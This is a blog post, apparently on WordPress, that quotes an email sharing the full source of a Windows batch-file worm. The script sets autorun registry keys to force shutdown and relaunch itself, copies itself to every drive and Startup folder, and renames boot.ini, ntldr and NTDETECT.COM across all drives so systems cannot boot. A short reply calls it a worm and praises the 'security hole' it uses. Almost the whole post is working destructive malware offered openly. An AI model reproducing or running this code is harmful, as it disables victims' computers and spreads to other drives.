Anatomy of an worm written with plain windows batch commands


On 8/26/07, Shezan <shezan2k7[at]gmail.com> wrote:
I created it with Notepad. I actually created a MS-DOS .bat file using notepad and then converted the shezan.bat file to .exe using using a bat2exe software.. Its nothing . kono bhabe jora tali die baniechhi… Check the source code…..
@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! that you’ve found a great security hole windows has. Its a security hole because Windows lets the program change certain settings without making precautions. Have you tested the renaming part of this?
Now listen.. its nothing near to virus. Its just a malware. Virus needs lots of capability to be called as a virus. Replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can though be called as an worm.
Antiviruses detect it as those test in heuristic mode…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s